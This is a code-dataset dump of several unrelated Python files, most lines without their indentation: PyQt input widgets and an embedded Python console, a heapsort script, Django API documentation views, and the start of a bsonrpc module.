def setValue(self, v):
v = str(v)
if self.current_value == v: return
self.current_value = v
self.setText(v)
self.valueChanged.emit(v)
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return self.text()
def text(self):
ret = super(QLineWidget, self).text()
return ret
class QTextWidget(QtGui.QTextEdit):
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QTextWidget, self).__init__(parent)
self.setTabChangesFocus(True)
self.current_value = None
self.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.resultHighlighter = PythonHighlighter(self)
def focusOutEvent(self, event):
super(QTextWidget, self).focusOutEvent(event)
self.setValue(self.toPlainText())
def setValue(self, v):
v = str(v)
if self.current_value == v: return
self.current_value = v
self.setText(v)
self.valueChanged.emit(v)
def value(self):
		# return the widget's text; calling self.value() here would recurse infinitely
		return self.toPlainText()
class QCommandEntryWidget(QtGui.QTextEdit):
def __init__(self, *args):
QtGui.QTextEdit.__init__(self, *args)
self.setAcceptRichText(False)
def keyPressEvent(self, keyEvent):
if (
(keyEvent.key() == QtCore.Qt.Key_Enter) or
(keyEvent.key() == QtCore.Qt.Key_Return and
keyEvent.modifiers() & QtCore.Qt.ControlModifier)):
self.emit(QtCore.SIGNAL('enterPressed()'))
elif keyEvent.key() == QtCore.Qt.Key_Tab:
keyEvent.accept()
self.emit(QtCore.SIGNAL('tabPressed()'))
else:
QtGui.QTextEdit.keyPressEvent(self, keyEvent)
class HighlightingRule:
def __init__(self, pattern, format):
self.pattern = pattern
self.format = format
class PythonHighlighter(QtGui.QSyntaxHighlighter):
"""
Python Highlighter code borrowed from
http://wiki.python.org/moin/PyQt/Python syntax highlighting
"""
def __init__(self, document):
QtGui.QSyntaxHighlighter.__init__(self, document)
self.document = document
self.highlightingRules = []
STYLES = {
'keyword': self.format('blue'),
'operator': self.format('black'),
'brace': self.format('brown'),
'defclass': self.format('darkBlue', 'bold'),
'string': self.format('magenta'),
'string2': self.format('darkMagenta'),
'comment': self.format('darkGreen', 'italic'),
'self': self.format('black', 'italic'),
'numbers': self.format('purple'),
}
# Python keywords
keywords = [
'and', 'assert', 'break', 'class', 'continue', 'def',
'del', 'elif', 'else', 'except', 'exec', 'finally',
'for', 'from', 'global', 'if', 'import', 'in',
'is', 'lambda', 'not', 'or', 'pass', 'print',
'raise', 'return', 'try', 'while', 'yield',
'None', 'True', 'False',
]
# Python operators
operators = [
'=',
# Comparison
'==', '!=', '<', '<=', '>', '>=',
# Arithmetic
'\+', '-', '\*', '/', '//', '\%', '\*\*',
# In-place
'\+=', '-=', '\*=', '/=', '\%=',
# Bitwise
'\^', '\|', '\&', '\~', '>>', '<<',
]
# Python braces
braces = [
'\{', '\}', '\(', '\)', '\[', '\]',
]
self.tri_single = (QtCore.QRegExp("'''"), 1, STYLES['string2'])
self.tri_double = (QtCore.QRegExp('"""'), 2, STYLES['string2'])
rules = []
# Keyword, operator, and brace rules
rules += [(r'\b%s\b' % w, 0, STYLES['keyword'])
for w in keywords]
rules += [(r'%s' % o, 0, STYLES['operator'])
for o in operators]
rules += [(r'%s' % b, 0, STYLES['brace'])
for b in braces]
# All other rules
rules += [
# 'self'
(r'\bself\b', 0, STYLES['self']),
# Double-quoted string, possibly containing escape sequences
(r'"[^"\\]*(\\.[^"\\]*)*"', 0, STYLES['string']),
# Single-quoted string, possibly containing escape sequences
(r"'[^'\\]*(\\.[^'\\]*)*'", 0, STYLES['string']),
# 'def' followed by an identifier
(r'\bdef\b\s*(\w+)', 1, STYLES['defclass']),
# 'class' followed by an identifier
(r'\bclass\b\s*(\w+)', 1, STYLES['defclass']),
# From '#' until a newline
(r'#[^\n]*', 0, STYLES['comment']),
# Numeric literals
(r'\b[+-]?[0-9]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?0[xX][0-9A-Fa-f]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\b', 0, STYLES['numbers']),
]
# Build a QRegExp for each pattern
self.rules = [(QtCore.QRegExp(pat), index, fmt) for (pat, index, fmt) in rules]
def format(self, color, style=''):
_color = QtGui.QColor()
_color.setNamedColor(color)
_format = QtGui.QTextCharFormat()
_format.setForeground(_color)
if 'bold' in style:
_format.setFontWeight(QtGui.QFont.Bold)
if 'italic' in style:
_format.setFontItalic(True)
return _format
def highlightBlock(self, text):
# Do other syntax formatting
for expression, nth, format in self.rules:
index = expression.indexIn(text, 0)
while index >= 0:
# We actually want the index of the nth match
index = expression.pos(nth)
length = len(str(expression.cap(nth)))
self.setFormat(index, length, format)
index = expression.indexIn(text, index + length)
self.setCurrentBlockState(0)
# Do multi-line strings
in_multiline = self.match_multiline(text, *self.tri_single)
if not in_multiline:
in_multiline = self.match_multiline(text, *self.tri_double)
def match_multiline(self, text, delimiter, in_state, style):
# If inside triple-single quotes, start at 0
if self.previousBlockState() == in_state:
start = 0
add = 0
# Otherwise, look for the delimiter on this line
else:
start = delimiter.indexIn(text)
# Move past this match
add = delimiter.matchedLength()
# As long as there's a delimiter match on this line...
while start >= 0:
# Look for the ending delimiter
end = delimiter.indexIn(text, start + add)
# Ending delimiter on this line?
if end >= add:
length = end - start + add + delimiter.matchedLength()
self.setCurrentBlockState(0)
# No; multi-line string
else:
self.setCurrentBlockState(in_state)
length = len(str(text)) - start + add
# Apply formatting
self.setFormat(start, length, style)
# Look for the next match
start = delimiter.indexIn(text, start + length)
class PythonConsole(QtGui.QFrame):
import re
findIdentifier = re.compile(r'([a-zA-Z0-9.]*)$')
def __init__(self, *args):
QtGui.QFrame.__init__(self, *args)
# Set layout and split the results field (top) and the command field (bottom)
self.layout = QtGui.QVBoxLayout(self)
self.splitter = QtGui.QSplitter(QtCore.Qt.Vertical, self)
self.splitter.setOpaqueResize(1)
self.layout.addWidget(self.splitter)
# Initialise environment
self.environment = {}
# Build result widget
self.resultWidget = QtGui.QTextEdit(self.splitter)
self.resultWidget.setReadOnly(True)
self.resultWidget.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.resultWidget.setMinimumHeight(50)
self.resultWidget.setTabStopWidth(20)
self.resultHighlighter = PythonHighlighter(self.resultWidget)
# Insert a welcome message to results
import sys
welcomeMsg = 'Welcome to Python Earthling\n' + sys.version + '\n\n'
self.resultWidget.setText(welcomeMsg)
# Build command widget
self.commandWidget = QCommandEntryWidget(self.splitter)
self.commandWidget.setFont(QtGui.QFont('Courier New', 8, QtGui.QFont.Normal, 0))
self.commandWidget.setMinimumHeight(28)
self.commandWidget.setTabStopWidth(20)
self.commandHighlighter = PythonHighlighter(self.commandWidget)
self.connect(self.commandWidget, QtCore.SIGNAL('enterPressed()'), self.enterCommand)
self.connect(self.commandWidget, QtCore.SIGNAL('tabPressed()'), self.tabCommand)
# Define text formats
self.normalTextFormat = QtGui.QTextCharFormat()
self.normalTextFormat.setFontWeight(QtGui.QFont.Normal)
self.resultTextFormat = QtGui.QTextCharFormat()
self.resultTextFormat.setForeground(QtGui.QColor(40, 40, 200))
self.resultTextFormat.setFontWeight(QtGui.QFont.Normal)
self.suggestionTextFormat = QtGui.QTextCharFormat()
self.suggestionTextFormat.setForeground(QtGui.QColor(20, 160, 20))
self.suggestionTextFormat.setFontWeight(QtGui.QFont.Normal)
self.errorTextFormat = QtGui.QTextCharFormat()
self.errorTextFormat.setForeground(QtGui.QColor(200, 40, 40))
self.errorTextFormat.setFontWeight(QtGui.QFont.Normal)
# Initialise history and set actions to scroll up and down through the history
self.history = []
self.historyPosition = 0
self.previousHistoryAction = QtGui.QAction('Previous History', self)
self.previousHistoryAction.setShortcut(QtGui.QKeySequence('Alt+Up'))
self.nextHistoryAction = QtGui.QAction('Previous History', self)
self.nextHistoryAction.setShortcut(QtGui.QKeySequence('Alt+Down'))
self.previousHistoryAction.triggered.connect(self.previousHistory)
self.nextHistoryAction.triggered.connect(self.nextHistory)
self.commandWidget.addAction(self.previousHistoryAction)
self.commandWidget.addAction(self.nextHistoryAction)
self.buildMenuBar()
# IO redirection
self.stdout = self._Stdout(self.resultWidget)
self.stderr = self._Stderr(self.resultWidget)
self.runCommand('from Ops import Runtime')
self.runCommand('runtime = Runtime.getInstance()')
self.runCommand('interface = runtime.interface')
self.clearHistory()
def buildMenuBar(self):
# Set actions and shortcuts
cutShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Cut).toString()
copyShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Copy).toString()
pasteShortcut = QtGui.QKeySequence(QtGui.QKeySequence.Paste).toString()
self.scriptSaveAction = QtGui.QAction('Save Script...', self)
self.scriptLoadAction = QtGui.QAction('Load Script...', self)
self.scriptSaveHistoryAction = QtGui.QAction('Save History...', self)
self.scriptFetchHistoryAction = QtGui.QAction('Fetch History', self)
self.scriptClearHistoryAction = QtGui.QAction('Clear History', self)
self.scriptSaveAction.triggered.connect(self.saveScript)
self.scriptLoadAction.triggered.connect(self.loadScript)
self.scriptSaveHistoryAction.triggered.connect(self.saveHistory)
self.scriptFetchHistoryAction.triggered.connect(self.fetchHistory)
self.scriptClearHistoryAction.triggered.connect(self.clearHistory)
self.editClearAction = QtGui.QAction('Clear', self)
self.editCutAction = QtGui.QAction('Cut\t%s' % cutShortcut, self)
self.editCopyAction = QtGui.QAction('Copy\t%s' % copyShortcut, self)
self.editPasteAction = QtGui.QAction('Paste\t%s' % pasteShortcut, self)
self.editClearAction.triggered.connect(self.clear)
self.editCutAction.triggered.connect(self.cut)
self.editCopyAction.triggered.connect(self.copy)
self.editPasteAction.triggered.connect(self.paste)
# Create menus
self.menuBar = QtGui.QMenuBar(self)
self.layout.setMenuBar(self.menuBar)
self.scriptMenu = QtGui.QMenu('Script')
self.menuBar.addMenu(self.scriptMenu)
self.scriptMenu.addAction(self.scriptSaveAction)
self.scriptMenu.addAction(self.scriptLoadAction)
self.scriptMenu.addSeparator()
self.scriptMenu.addAction(self.scriptSaveHistoryAction)
self.scriptMenu.addAction(self.scriptFetchHistoryAction)
self.scriptMenu.addAction(self.scriptClearHistoryAction)
self.editMenu = QtGui.QMenu('Edit')
self.menuBar.addMenu(self.editMenu)
self.editMenu.addAction(self.editClearAction)
self.editMenu.addAction(self.editCutAction)
self.editMenu.addAction(self.editCopyAction)
self.editMenu.addAction(self.editPasteAction)
def saveScript(self):
filename = QtGui.QFileDialog.getSaveFileName(self, 'Save Script', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
file(filename, 'wt').write(self.commandWidget.toPlainText())
def loadScript(self):
filename = QtGui.QFileDialog.getOpenFileName(self, 'Load Script', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
commands = file(filename, 'rt').read()
self.commandWidget.clear()
self.commandWidget.setText(commands)
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.commandWidget.setFocus()
def historyToString(self):
return '\n'.join(self.history)
def saveHistory(self):
filename = QtGui.QFileDialog.getSaveFileName(self, 'Save History', selectedFilter='*.py')
if filename and filename[0]:
filename = str(filename[0])
file(filename, 'wt').write(self.historyToString())
def fetchHistory(self):
self.commandWidget.clear()
self.commandWidget.setText(self.historyToString())
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
self.commandWidget.setFocus()
def clearHistory(self):
self.history = []
def clear(self):
self.resultWidget.clear()
def cut(self):
if (len(str(self.commandWidget.textCursor().selectedText()))):
self.commandWidget.cut()
else:
self.resultWidget.cut()
def copy(self):
if (len(str(self.commandWidget.textCursor().selectedText()))):
self.commandWidget.copy()
else:
self.resultWidget.copy()
def paste(self):
self.commandWidget.paste()
def previousHistory(self):
# Triggered using Alt+Up
# Find the previous (decremented position) in the history and insert it in the right
# place in the command field if available
self.historyPosition = min(self.historyPosition + 1, len(self.history))
if not self.historyPosition:
self.commandWidget.clear()
else:
self.commandWidget.setText(self.history[-self.historyPosition])
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def nextHistory(self):
# Triggered using Alt+Down
# Find the next (incremented position) in the history and insert it in the right
# place in the command field if available
self.historyPosition = max(self.historyPosition - 1, 0)
if not self.historyPosition:
self.commandWidget.clear()
else:
self.commandWidget.setText(self.history[-self.historyPosition])
self.commandWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def echoCommand(self, command, format=None):
# Print the command to the result field
# Set a default text format if it hasn't been supplied
if format is None: format = self.normalTextFormat
# Split the lines
lines = command.splitlines()
if lines and not lines[-1].strip():
del lines[-1]
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
for line in lines:
textCursor = self.resultWidget.textCursor()
# textCursor.insertText(">> ", format)
textCursor.insertText("%s\n" % line, format)
def enterCommand(self):
# Execute the command as the user just pressed Ctrl-Enter or Ctrl-Return
# Get the position of the text cursor and get the command from the command field
cursor = self.commandWidget.textCursor()
command = str(self.commandWidget.toPlainText())
# Maya behaviour:
# If the user has selected a particular bit of command text we keep it, otherwise
# we clear the command field
if cursor.hasSelection():
start, end = cursor.selectionStart(), cursor.selectionEnd()
command = command[start:end]
else:
self.commandWidget.setText('')
self.commandWidget.textCursor().setPosition(0)
# Echo the command to the result field and execute the command
self.echoCommand(command, format=self.resultTextFormat)
self.runCommand(command)
def tabCommand(self):
# Print command completion if the user presses the tab key
# Create a completer
import rlcompleter, os
completer = rlcompleter.Completer(self.environment)
# Get the text we just wrote and look for the nearest identifier
index = self.commandWidget.textCursor().position()
if index == 0:
text = ''
else:
text = str(self.commandWidget.toPlainText())[:index]
match = self.findIdentifier.search(text)
if match: text = match.group(1)
# Remember the length of the text we wrote for later when we want to
# add to it
textOriginalLength = len(text)
# Try to find all the states (suggestions) available for the command text
# Collect the available options to a list and build a cache to avoid repetitions
options = []
cache = {}
try:
currentState = 0
while True:
result = completer.complete(text, currentState)
currentState += 1
if result is None: break
if cache.has_key(result): continue
cache[result] = True
options.append(result)
except TypeError as e:
print (str(e))
if len(options) == 0: return
# Check it's not the same as what we just wrote
if len(options) == 1 and options[0] != text:
self.commandWidget.insertPlainText(options[0][textOriginalLength:])
else:
commonPrefix = os.path.commonprefix(options)
if len(commonPrefix) > textOriginalLength:
self.commandWidget.insertPlainText(commonPrefix[textOriginalLength:])
self.resultWidget.textCursor().insertText(' '.join(options) + '\n', self.suggestionTextFormat)
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
def runCommand(self, command):
        # Add the command to history (even if it fails) and only keep the last 1000 entries
self.history.append(command)
self.history = self.history[-1000:]
self.historyPosition = 0
# Standard streams
import sys
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdout = self.stdout
sys.stderr = self.stderr
# Evaluate/execute command and report results
try:
result = None
try:
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
result = eval(command, self.environment, self.environment)
except SyntaxError:
exec (command, self.environment)
# Check if the evaluation was successful and if so report it in the results field
# Add the results to the environment
if result is not None:
                    self.environment['_'] = result
                    self.echoCommand(str(result))
except:
# Get the traceback information and add the formatted output to the results field
import traceback, sys
exceptionType, exception, tb = sys.exc_info()
entries = traceback.extract_tb(tb)
entries.pop(0)
# Build and print a list containing the error report
lines = []
if entries:
lines += traceback.format_list(entries)
lines += traceback.format_exception_only(exceptionType, exception)
for line in lines:
self.echoCommand(line, format=self.errorTextFormat)
finally:
# Restore streams
sys.stdout = old_stdout
sys.stderr = old_stderr
self.resultWidget.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor)
class _Stdout:
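        # File-like object that redirects sys.stdout writes into the results pane.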
def __init__(self, resultWidget):
self.resultWidgetRef = weakref.ref(resultWidget)
self.stdoutTextFormat = QtGui.QTextCharFormat()
self.stdoutTextFormat.setFontWeight(QtGui.QFont.Normal)
def write(self, msg):
widget = self.resultWidgetRef()
if not widget: return
widget.textCursor().insertText(msg, self.stdoutTextFormat)
widget.textCursor().movePosition(QtGui.QTextCursor.End)
def flush(self):
pass
class _Stderr:
def __init__(self, resultWidget):
self.resultWidgetRef = weakref.ref(resultWidget)
self.errorTextFormat = QtGui.QTextCharFormat()
self.errorTextFormat.setForeground(QtGui.QColor(200, 40, 40))
self.errorTextFormat.setFontWeight(QtGui.QFont.Normal)
def write(self, msg):
widget = self.resultWidgetRef()
if not widget: return
widget.textCursor().insertText(msg, self.errorTextFormat)
widget.textCursor().movePosition(QtGui.QTextCursor.End)
def flush(self):
pass
class QfloatWidget(QtGui.QLineEdit):
    ''' Draggable spin box: Ctrl + left, middle or right mouse button scrubs the value
    by progressively larger steps.
    '''
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QfloatWidget, self).__init__(parent)
# self.setDecimals(4)
# self.setButtonSymbols(QtGui.QAbstractSpinBox.NoButtons)
# self.setKeyboardTracking(False) # don't emit 3 times when typing 100
self.minstep = 0.001
self._dragging = False
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu) # no copy/paste menu to interfere with dragging
# catch the mouse events from the lineedit that is a child of the spinbox
# editor = self.findChild(QtGui.QLineEdit)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
# Initialise the current value
self.current_value = None
# Create a new Validator
# dblValidator = QtGui.QDoubleValidator(self)
dbl_validator = floatValidator(self)
self.setValidator(dbl_validator)
# Initialise the Range variables to nothing.
self.setRange()
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = float(v) # ensure it's a float!
if self.current_value == v: return
self.current_value = v
self.setText(str(v))
# if not self._dragging:
self.valueChanged.emit(v)
# Constrains the spin box to between two values
def setRange(self, min=None, max=None):
try:
self.validator().setRange(min, max)
# print ("Valid from {} to {}".format(str(self.validator().bottom()), str(self.validator().top())))
except:
print ("Inputs to QfloatWidget.setRange() are invalid with values {} and {}".format(min, max))
# Allows the box to be locked or unlocked
# Defaults to true so foo.setLocked() would lock "foo"
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return float(self.text())
def text(self):
ret = super(QfloatWidget, self).text()
return ret
def eventFilter(self, obj, event):
if event.type() == QtGui.QMouseEvent.MouseButtonPress:
if not event.modifiers() & QtCore.Qt.ControlModifier:
return False
self.gpx, self.gpy = event.globalX(), event.globalY()
self.startX, self.startY = event.x(), event.y()
if event.button() & QtCore.Qt.LeftButton:
self._dragging = self.minstep
if event.button() & QtCore.Qt.MiddleButton:
self._dragging = self.minstep * 100
if event.button() & QtCore.Qt.RightButton:
self._dragging = self.minstep * 10000
return True
elif event.type() == QtGui.QMouseEvent.MouseButtonRelease:
if self._dragging is not False:
self._dragging = False
self.setValue(self.text())
else:
self._dragging = False
return True
elif event.type() == QtGui.QMouseEvent.MouseMove:
if self._dragging:
if not self.isReadOnly():
newValue = (self.value() + (event.x() - self.startX) * self._dragging)
if self.validator().bottom() is not None or self.validator().top() is not None:
newValue = np.clip(newValue, self.validator().bottom(), self.validator().top())
self.setValue(newValue)
QtGui.QCursor.setPos(self.gpx, self.gpy)
return True
return False
class QvectorWidget(QtGui.QWidget):
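    # Row of QfloatWidget editors backed by a numpy vector; re-emits valueChanged
    # with the whole vector whenever one component changes.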
valueChanged = QtCore.Signal(list)
def __init__(self, size, parent=None):
super(QvectorWidget, self).__init__(parent)
self.vector = np.zeros(size, dtype=np.float32)
layout = QtGui.QHBoxLayout()
for vi in range(size):
w = QfloatWidget(self)
layout.addWidget(w)
w.valueChanged.connect(functools.partial(self.handleValueChanged, vi), QtCore.Qt.DirectConnection)
layout.setContentsMargins(0, 0, 0, 0)
self.blockSignals = False
self.setLayout(layout)
def handleValueChanged(self, vi, v):
self.vector[vi] = v
if not self.blockSignals:
self.valueChanged.emit(self.vector)
def setValue(self, v):
self.blockSignals = True
self.vector[:] = v
for vi, v in enumerate(self.vector):
self.layout().itemAt(vi).widget().setValue(v)
self.blockSignals = False
class QmatrixWidget(QtGui.QWidget):
valueChanged = QtCore.Signal(list)
'''
    this should be replaced with qdatawidget mappers and a proper qt model of the retargeting
data structure
'''
def __init__(self, rows, cols, parent=None):
super(QmatrixWidget, self).__init__(parent)
self.rows = rows
self.cols = cols
self.matrix = np.zeros((rows, cols), dtype=np.float32)
self.blockSignals = False
layout = QtGui.QVBoxLayout()
for ri in range(rows):
row = QvectorWidget(cols, self)
row.valueChanged.connect(functools.partial(self.handleValueChanged, ri), QtCore.Qt.DirectConnection)
layout.addWidget(row)
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def handleValueChanged(self, ri, v):
self.matrix[ri, :] = v
if not self.blockSignals:
self.valueChanged.emit(self.matrix)
def setValue(self, v):
self.blockSignals = True
self.matrix[:, :] = v.copy()
for ri, rv in enumerate(self.matrix):
self.layout().itemAt(ri).widget().setValue(rv)
self.blockSignals = False
class QKeySequenceEdit(QtGui.QLineEdit):
    ''' Line edit for capturing key sequences, for use in a keyboard shortcut editor (although this
    would probably work better as a label on a button than as a line edit).'''
def __init__(self, *args):
super(QKeySequenceEdit, self).__init__(*args)
self.keySequence = None
def setKeySequence(self, keySequence):
self.keySequence = keySequence
self.setText(self.keySequence.toString(QtGui.QKeySequence.NativeText))
def keyPressEvent(self, event):
if event.type() == QtCore.QEvent.KeyPress:
key = event.key()
if key == QtCore.Qt.Key_unknown:
return
# just a modifier? Ctrl, Shift, Alt, Meta.
if key in [QtCore.Qt.Key_Control, QtCore.Qt.Key_Shift, QtCore.Qt.Key_Alt, QtCore.Qt.Key_Meta]:
# print("Single click of special key: Ctrl, Shift, Alt or Meta")
# print("New KeySequence:", QtGui.QKeySequence(key).toString(QtGui.QKeySequence.NativeText))
return
# check for a combination of user clicks
modifiers = event.modifiers()
if modifiers & QtCore.Qt.ShiftModifier: key += QtCore.Qt.SHIFT
if modifiers & QtCore.Qt.ControlModifier: key += QtCore.Qt.CTRL
if modifiers & QtCore.Qt.AltModifier: key += QtCore.Qt.ALT
if modifiers & QtCore.Qt.MetaModifier: key += QtCore.Qt.META
self.setKeySequence(QtGui.QKeySequence(key))
event.accept()
class intValidator(QtGui.QValidator):
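    # QValidator for integer input, optionally clamped to a [min, max] range via setRange().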
def __init__(self, parent=None):
QtGui.QValidator.__init__(self, parent)
self.parent = parent
self.min_value = None
self.max_value = None
def setRange(self, min=None, max=None):
try:
self.min_value = None if min is None else int(min)
self.max_value = None if max is None else int(max)
except ValueError:
assert False, "Incorrect value types for floatValidator.setRange()"
def bottom(self):
return self.min_value
def top(self):
return self.max_value
def validate(self, text, length):
if len(text) == 0 or text == "-": return (QtGui.QValidator.Intermediate)
if self.parent.hasFocus():
try:
value = int(text)
except ValueError:
return (QtGui.QValidator.Invalid)
else:
try:
value = int(text)
except ValueError:
return (QtGui.QValidator.Invalid)
value = int(text)
if self.min_value is not None and value < self.min_value: return (QtGui.QValidator.Invalid)
if self.max_value is not None and value > self.max_value: return (QtGui.QValidator.Invalid)
return (QtGui.QValidator.Acceptable)
def fixup(self, input):
if input == "" or input == "-":
            self.parent.setText(str(self.min_value) if self.min_value is not None else "0")
else:
if self.min_value is not None or self.max_value is not None:
value = np.clip(int(input), self.min_value, self.max_value)
self.parent.setText(str(value))
class floatValidator(QtGui.QValidator):
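    # QValidator for float input (scientific notation allowed), optionally range-limited via setRange().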
def __init__(self, parent=None):
from re import compile as re_compile
QtGui.QValidator.__init__(self, parent)
self.parent = parent
self.min_value = None
self.max_value = None
# RegExp for a valid number including scientific notation
self._re = re_compile("^[-+]?[0-9]*\.?[0-9]*([eE][-+]?[0-9]*)?$")
def setRange(self, min=None, max=None):
try:
self.min_value = None if min is None else float(min)
self.max_value = None if max is None else float(max)
except ValueError:
assert False, "Incorrect value types for floatValidator.setRange()"
def bottom(self):
return self.min_value
def top(self):
return self.max_value
def validate(self, text, length):
if len(text) == 0: return (QtGui.QValidator.Intermediate)
        if self.parent.hasFocus():
            # While the user is typing only check that the text still looks like a
            # number; the full range check applies when the widget is not focused.
            if not self._re.match(text):
                return (QtGui.QValidator.Invalid)
            return (QtGui.QValidator.Acceptable)
        try:
            value = float(text)
        except ValueError:
            return (QtGui.QValidator.Invalid)
        if self.min_value is not None and value < self.min_value: return (QtGui.QValidator.Invalid)
        if self.max_value is not None and value > self.max_value: return (QtGui.QValidator.Invalid)
        return (QtGui.QValidator.Acceptable)
def fixup(self, input):
if input == "":
            self.parent.setText(str(self.min_value) if self.min_value is not None else "0.0")
else:
try:
value = float(input)
except ValueError: # Error is with an incomplete scientific notation
input = input[:input.find("e")]
                value = float(input)
if self.min_value is not None or self.max_value is not None:
value = np.clip(value, self.min_value, self.max_value)
self.parent.setText(str(value))
if __name__ == '__main__':
import sys
# from UI import QAppCtx
app = QtGui.QApplication(sys.argv)
app.setStyle('plastique')
# with QAppCtx():
# dialog = QmatrixWidget(3,4,None)
# def p(*x): print (x)
# dialog.valueChanged.connect(p)
# dialog.setValue(np.eye(3,4))
# dialog.show()
# def modeSelectCB(mode,val):
# print (mode,val)
# options = ['orig','proj','proj_freeze','synth','diff']
# win = Qselect(options = options, default = 'diff', cb = modeSelectCB)
# win.show()
listWidget = QOrderedListWidget(['Hello', 'World', 'this', 'is', 'a', 'test'])
listWidget.setStyleSheet("border:0;")
listWidget.show()
def testCB(*x): print ("Value is: {}".format(x))
slideWidgetHolder = QtGui.QGroupBox()
slideWidget = QslideLimitValue("Test Slider", 0, -180, 180, testCB, "Slider")
# layout = QtGui.QHBoxLayout()
# layout.setContentsMargins(0,0,0,0)
# layout.addWidget(slideWidget.slider)
# layout.addWidget(slideWidget.display)
slideWidgetHolder.setLayout(slideWidget)
slideWidgetHolder.show()
slideWidget2 = QslideLimitControl()
slideWidget2.show()
app.connect(app, QtCore.SIGNAL('lastWindowClosed()'), app.quit)
sys.exit(app.exec_())
| mit | -1,527,965,147,184,060,700 | 32.641414 | 135 | 0.714495 | false |
samueljackson92/scripts | python/heapsort.py | 1 | 1562 | # heapsort.py
# Date: 15/06/13
# Author: Samuel Jackson ([email protected])
# Description: Python implementation of a basic heapsort.
# Based heavily on the example code from http://en.wikipedia.org/wiki/Heapsort
import random
def swap(data, i, j):
temp = data[i]
data[i] = data[j]
data[j] = temp
#convert our data into a max-order heap in place in the array
def heapify(data):
#get position of last parent node in heap
start = (len(data) -1) / 2
while (start >= 0):
#sift down from start such that all nodes below start are then in place
siftDown(data, start, len(data)-1)
start = start -1
#Re-organize the heap from a given point in the list to a given end point
def siftDown(data, start, end):
root = start
#while root has at least one child
while (root * 2 + 1 <= end):
child = root * 2 + 1 #get left child
swapNode = root #keep track of node to swap with
#check if left child needs to be swapped
if(data[swapNode] < data[child]):
swapNode = child
#check if right child exists and needs to be swapped
if(child+1 <= end and data[swapNode] < data[child+1]):
swapNode = child+1
#check if we need to swap
if(swapNode != root):
swap(data, root, swapNode)
root = swapNode
else:
return
def heap_sort(data):
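    # In-place heapsort: build a max-heap, then repeatedly swap the root (maximum)
    # to the end of the unsorted region and sift the new root back down.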
end = len(data) -1
#place data in max heap order
heapify(data)
while (end > 0):
#swap the max element to the end
print ">>", data
swap(data, 0, end)
end = end -1
#re-heapify the data
siftDown(data, 0, end)
d = random.sample(range(30), 10)
print d
heap_sort(d)
print d | mit | -2,002,207,885,747,726,000 | 21.014085 | 78 | 0.677977 | false |
DemocracyClub/yournextrepresentative | ynr/apps/api/views.py | 1 | 2639 | from collections import OrderedDict
from django.views.generic import TemplateView
from rest_framework.request import Request
from drf_yasg import openapi
from drf_yasg.generators import OpenAPISchemaGenerator
from elections.models import Election
class OpenAPISchemaMixin:
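    # Builds a drf-yasg OpenAPI schema for the configured URL patterns/version and
    # exposes it (with keys sorted recursively) to the template context as "schema".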
version = None
patterns = None
def _sort_ordered_dict_by_keys(self, od):
keys = sorted(list(od.keys()))
new_od = OrderedDict()
for key in keys:
if type(od[key]) == OrderedDict:
od[key] = self._sort_ordered_dict_by_keys(od[key])
new_od[key] = od[key]
return new_od
def get_schema(self):
schema = OpenAPISchemaGenerator(
openapi.Info(
title="Snippets API",
default_version="self.version",
description="Test description",
terms_of_service="https://www.google.com/policies/terms/",
contact=openapi.Contact(email="[email protected]"),
license=openapi.License(name="BSD License"),
),
patterns=self.patterns,
version="next",
)
request = Request(self.request)
schema_obj = schema.get_schema(request=request, public=True)
return self._sort_ordered_dict_by_keys(schema_obj)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["schema"] = self.get_schema()
context["version"] = self.version
return context
class NextAPIDocsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/next_home.html"
class APIDocsEndpointsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/endpoints.html"
class APIDocsDefinitionsView(OpenAPISchemaMixin, TemplateView):
template_name = "api/definitions.html"
patterns = None
version = "next"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["schema"] = self.get_schema()
return context
class CSVListView(TemplateView):
template_name = "api/csv_list.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
base_qs = Election.objects.all().order_by(
"current", "-election_date", "slug"
)
context["current_elections"] = base_qs.current()
context["future_elections"] = base_qs.future().exclude(current=True)
context["past_elections"] = base_qs.past().exclude(current=True)
return context
class ResultsDocs(TemplateView):
template_name = "api/results.html"
| agpl-3.0 | -4,075,647,256,769,377,000 | 29.686047 | 76 | 0.63471 | false |
seprich/py-bson-rpc | bsonrpc/definitions.py | 1 | 4837 | # -*- coding: utf-8 -*-
'''
Definitions to match messages to JSON RPC 2.0 schema and to produce them.
Also RPC error definitions.
'''
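# Illustrative (not taken from this codebase) JSON-RPC 2.0 message shapes handled
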